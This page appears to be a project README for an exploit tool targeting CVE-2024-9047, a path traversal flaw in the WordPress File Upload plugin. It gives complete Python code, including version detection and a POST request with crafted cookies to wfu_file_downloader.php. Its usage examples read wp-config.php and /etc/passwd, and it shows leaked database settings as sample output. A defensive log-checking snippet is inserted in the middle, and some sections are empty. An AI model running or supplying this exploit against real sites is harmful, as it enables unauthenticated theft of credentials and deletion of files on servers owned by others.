WordPress File Upload plugin path traversal exploit tool: CVE-2024-9047

2026-07-05

WordPress File Upload plugin path traversal exploit tool (CVE-2024-9047)

This project provides an exploit script for a critical security vulnerability in the WordPress File Upload plugin. The vulnerability (CVE-2024-9047) affects all plugin versions up to and including 4.24.11 and allows an unauthenticated attacker to read or delete arbitrary files on the server via path traversal.

Features

Installation guide

System requirements

Installation steps

  1. Clone or download this project to your machine:

    git clone 
    cd CVE-2024-9047-Exploit

  2. Install the Python dependency (if requests is not already installed):

    pip install requests


Usage

Basic usage

python CVE-2024-9047.py --url <target WordPress site URL> [--command <target file path>]

Typical usage scenarios

Scenario 1: quickly check for the vulnerability and read the default configuration file
python CVE-2024-9047.py -u 

The tool detects the plugin version automatically; if the version is ≤ 4.24.11 and the PHP environment meets the requirement, it attempts to read the default wp-config.php file.

Scenario 2: specify another sensitive file to read
python CVE-2024-9047.py -u  --command /../../../../../etc/passwd
Example output
Detected version: "trunk"
The site is vulnerable!
Exploit successful! Response:
// ** Database settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'wordpress7' );
...

How it works

  1. Exploitation: a POST request is sent to /wp-content/plugins/wp-file-upload/wfu_file_downloader.php carrying specially crafted Cookie and form data, using path traversal to read the target file.
  2. Output: if the attack succeeds, the file contents are printed to the console; otherwise the failing status code is shown.
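As an added example that is not part of this tool or of the plugin: a small Python check a defender could run over request records (for instance from a reverse proxy or WAF that logs cookies) to flag requests of the shape described above, built around the containment rule the downloader should apply to any requested path. The endpoint path comes from this page; the upload base directory and the sample requests are constructed assumptions.

```python
import posixpath
from urllib.parse import urlsplit

# Endpoint named on the page. The upload base directory is an assumption for
# this example and stands in for wherever a given site keeps its uploads.
DOWNLOADER = "/wp-content/plugins/wp-file-upload/wfu_file_downloader.php"
UPLOAD_BASE = "/var/www/html/wp-content/uploads"


def stays_inside(base, requested):
    """Containment check: join the requested name onto base and verify the
    normalised result is still under base. Absolute paths and '..' escapes fail."""
    if requested.startswith("/") or "\\" in requested:
        return False
    resolved = posixpath.normpath(posixpath.join(base, requested))
    return resolved == base or resolved.startswith(base + "/")


def inspect_request(method, url, cookies):
    """Return a list of findings for one request; [] means nothing suspicious.
    Only POSTs to the downloader endpoint are examined."""
    findings = []
    if method.upper() != "POST" or not urlsplit(url).path.endswith(DOWNLOADER):
        return findings
    # The request shape shown on the page sets a wfu_ABSPATH cookie and a
    # wfu_storage_<id> cookie holding the path of the file to be served.
    if "wfu_ABSPATH" in cookies:
        findings.append("wfu_ABSPATH cookie supplied by client")
    for name, value in cookies.items():
        if name.startswith("wfu_storage_") and not stays_inside(UPLOAD_BASE, value):
            findings.append(f"{name} escapes upload directory: {value}")
    return findings


# Constructed sample traffic: one request matching the page's exploit shape,
# one legitimate-looking download, one request to an unrelated path.
SAMPLES = [
    ("POST", "https://wp.example.test" + DOWNLOADER,
     {"wfu_storage_file123": "/../../../../../etc/passwd", "wfu_ABSPATH": "/"}),
    ("POST", "https://wp.example.test" + DOWNLOADER,
     {"wfu_storage_file9": "2024/10/report.pdf"}),
    ("GET", "https://wp.example.test/wp-login.php", {}),
]

if __name__ == "__main__":
    for method, url, cookies in SAMPLES:
        print(method, url, inspect_request(method, url, cookies) or "ok")
```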

Core code

1. Version detection module

import argparse
import requests  # dependency named in the installation steps


def version_tuple(tag):
    # "4.24.11" -> (4, 24, 11); a non-numeric tag such as "trunk" gives ()
    return tuple(int(part) for part in tag.split(".") if part.isdigit())


def check_version(url):
    # The version is read from the plugin's public readme.txt ("Stable tag: x.y.z").
    # The request line was missing from the page; the readme path follows the
    # standard WordPress plugin layout and is assumed here.
    readme_url = f"{url}/wp-content/plugins/wp-file-upload/readme.txt"
    try:
        response = requests.get(readme_url, timeout=10)
        if response.status_code == 200 and "Stable tag" in response.text:
            for line in response.text.splitlines():
                if "Stable tag" in line:
                    version = line.split(":")[1].strip()
                    print(f"Detected version: {version}")
                    # Compare numerically: the original string comparison
                    # misorders versions such as 4.9.x against 4.24.11.
                    if version_tuple(version) <= (4, 24, 11):
                        print("The site is vulnerable!")
                        return True
                    else:
                        print("The site is not vulnerable.")
                        return False
        else:
            print("Unable to detect the plugin version.")
            return False
    except requests.RequestException as e:
        print(f"Error checking version: {e}")
        return False

2. Core exploitation module

def exploit(url, command):
    try:
        exploit_url = f"{url}/wp-content/plugins/wp-file-upload/wfu_file_downloader.php"
        cookies = {
            "wp_wpfileupload_testupload": "Nxploited",
            "wfu_storage_file123": command,
            "wfu_download_ticket_ticket123": "9876543210987",
            "wfu_ABSPATH": "/",
        }
        data = {
            "file": "file123",
            "ticket": "ticket123",
            "handler": "dboption",
            "session_legacy": "1",
            "dboption_base": "cookies",
            "dboption_useold": "0",
            "wfu_cookie": "wp_wpfileupload_testupload",
        }
        response = requests.post(exploit_url, cookies=cookies, data=data, timeout=10)
        if response.status_code == 200:
            print("Exploit successful! Response:")
            print(response.text)
        else:
            print(f"Exploit failed. Response code: {response.status_code}")
    except requests.RequestException as e:
        print(f"Error during exploitation: {e}")

3. Main control flow

def main():
    parser = argparse.ArgumentParser(description="The WordPress File Upload plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 4.24.11 via wfu_file_downloader.php. This makes it possible for unauthenticated attackers to read or delete files outside of the originally intended directory. Successful exploitation requires the targeted WordPress installation to be using PHP 7.4 or earlier.")
    parser.add_argument("--url", "-u", required=True, help="Target URL (e.g., )")
    parser.add_argument("--command", "-c", default="/../../../../../opt/lampp/htdocs/wordpress/wp-config.php", help="File path to read")
    args = parser.parse_args()
    target_url = args.url.rstrip("/")
    command = args.command
    if check_version(target_url):
        exploit(target_url, command)


if __name__ == "__main__":
    main()

Remediation advice

Disclaimer

This tool and its documentation are intended solely for security research, education, and authorized penetration testing. Using this tool against any system without explicit authorization is illegal, and the user bears full legal responsibility. The project author and contributors accept no liability for any misuse.
